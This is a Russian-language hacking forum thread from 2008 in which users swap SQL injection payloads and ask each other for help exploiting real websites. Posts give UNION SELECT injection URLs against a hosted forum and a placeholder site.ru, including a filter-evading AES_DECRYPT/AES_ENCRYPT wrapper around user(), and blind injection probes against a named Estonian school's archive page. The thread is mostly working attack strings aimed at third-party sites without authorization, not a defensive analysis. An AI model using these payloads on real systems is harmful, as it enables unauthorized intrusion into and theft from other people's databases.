15.04.2008, 21:56
|
|
Новичок
Регистрация: 27.09.2007
Сообщений: 11
С нами:
9800721
Репутация:
4
|
|
Вы правильно думаете. Я в принципе спрашиваю. Насколько понимаю, возможна))
|
|
|
15.04.2008, 21:59
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами:
9981026
Репутация:
728
|
|
2 VentRu
А почему бы и нет ? Конечно, возможно
|
|
|
|
15.04.2008, 22:10
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами:
10761096
Репутация:
27
|
|
Код:
http://hosted-forum.com/active_members.php?cat=-1+UNION+SELECT+1,version(),3/*
помогите дальше двинуться) |
|
|
|
16.04.2008, 00:38
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
С нами:
9568860
Репутация:
146
|
|
http://hosted-forum.com/active_members.php?cat=-1+UNION+SELECT+1,version(),3/*
где ты тут нашел sql ?  )
ща проверил,скуля есть, вчера не было )))))
видать сервак глючил или админ....
Последний раз редактировалось bag; 16.04.2008 в 12:27..
|
|
|
|
16.04.2008, 17:05
|
|
Новичок
Регистрация: 27.09.2007
Сообщений: 11
С нами:
9800721
Репутация:
4
|
|
Вчера смотрел, они с базой какие-то работы проводили.
|
|
|
|
17.04.2008, 17:55
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
http://www.tammiku.edu.ee/arhiv/06-07.php?month=1&year='
Ншёл сканер скулю. Сколько ни мудилсо, ниче вывести не смог ))).При запросе из баз выводит форбидден:Р. Зато запросы вида 1'+and+'2'='1&year=2008 пашут.Почему именно столько кавычек я хз.Есть подозрения, что для двойки две кавычки потому, что ид соответствует строковая переменная. Запоролся в общем йа : )(Это уже Blind sql inj).
|
|
|
|
17.04.2008, 21:43
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
http:/www.tammiku.edu.ee/arhiv/06-07.php?month=4'+and+'1'='0&year=2008
Шо тут гадать то:Р
|
|
|
|
18.04.2008, 11:14
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами:
9550090
Репутация:
137
|
|
http://www.site.ru/index.php?newsid=9999999999999+UNION+SELECT+1,2,3, 4,5,6,7/*
работает,
то на странице отображается 3 и 5
но когда хочу поставить version() то не работает ..
http://www.site.ru/index.php?newsid=9999999999999+UNION+SELECT+1,2,ve rsion(),4,5,6,7/*
выдаёт ошибку
как надо сделать ?
|
|
|
|
18.04.2008, 11:24
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами:
9550090
Репутация:
137
|
|
короче нашёл
http://www.site.ru/index.php?newsid=9999999999999+UNION+SELECT+1,2,3, 4,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),6,7/*
работает, что я могу дальше ? |
|
|
|
18.04.2008, 12:12
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами:
10393869
Репутация:
2032
|
|
nicusor version() ?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
